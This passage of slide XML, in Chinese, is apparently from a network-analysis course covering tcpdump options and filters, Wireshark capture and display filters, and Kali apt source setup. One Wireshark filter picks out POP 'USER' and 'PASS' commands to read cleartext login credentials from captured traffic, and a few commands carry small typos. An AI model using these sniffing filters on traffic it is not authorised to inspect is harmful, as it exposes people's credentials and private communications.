              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：将网络地址和广播地址转变成名字；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-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：将匹配信息包的代码以人们能够理解的汇编格式给出；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-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：在输出行打印出数据链路层的头部信息；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-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：将外部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>地址以数字的形式打印出来；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-t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：在输出的每一行不打印时间戳；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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：输出稍微详细的报文信息；加一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>更详细</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331933" y="30355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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>常用选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322064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tcpdump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正则实例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48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3771" y="1212924"/>
            <a:ext cx="9414588" cy="5579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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>次收发所有数据包并将抓包结果保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>再读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>抓包结果文件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tcpdump –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0 –c 10 –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.pacp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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump –r test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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口的所有数据包（指定端口范围</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>portrange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 1-1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump port 80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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获所有来自主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的进出所有数据包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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump host 114.254.151.51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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包中源地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的（目的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 114.254.151.51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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>和主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.52</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的通信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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdum host 114.254.151.51 and 114.254.151.52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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议并且源地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的端口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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 114.254.151.51 and port 80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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>除了和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>114.254.151.52</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>之外的所有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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包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200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump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host 114.254.151.51 and ! 114.254.151.52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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、截获长度大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击时，可以使用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tcpdump greater 1000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5752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0"/>
            <a:ext cx="10850563" cy="1028699"/>
          </a:xfrm>
        </p:spPr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wireshark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49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84988" y="1249359"/>
            <a:ext cx="8220269" cy="473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捕捉过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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  <a:sym typeface="+mn-lt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tcp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dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> port 3128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Ip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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> host 10.1.1.1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Host 10.1.2.3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400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Src host 10.1.1.1 and not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> net 10.200.0.0/16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Open Sans Extrabold" panose="020B0906030804020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans Extrabold" panose="020B0906030804020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>显示过滤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Snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> || dns || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym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Ip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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 10.1.1.1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Ip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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>! == 10.1.2.3 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip.dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> != 10.4.5.6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Tcp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 25 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Tcp.dsport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 25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Tcp.flags.syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcp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syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>标志的封包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http.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == “POST” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包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pop.request.command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 'USER' || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pop.request.command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 'PASS'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186457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设置更新源及网卡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4679" y="1324263"/>
            <a:ext cx="92369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Vim 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/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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/apt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sources.list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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deb http://mirrors.aliyun.com/kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> main non-free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contrib</a:t>
            </a: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deb http://mirrors.aliyun.com/kali-security/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/updates main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> non-free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deb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> http://mirrors.aliyun.com/kali-security/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/updates main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> non-free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apt-get update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79" y="4859954"/>
            <a:ext cx="3353091" cy="11461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54679" y="4176337"/>
            <a:ext cx="3262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Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vmware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网卡设置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
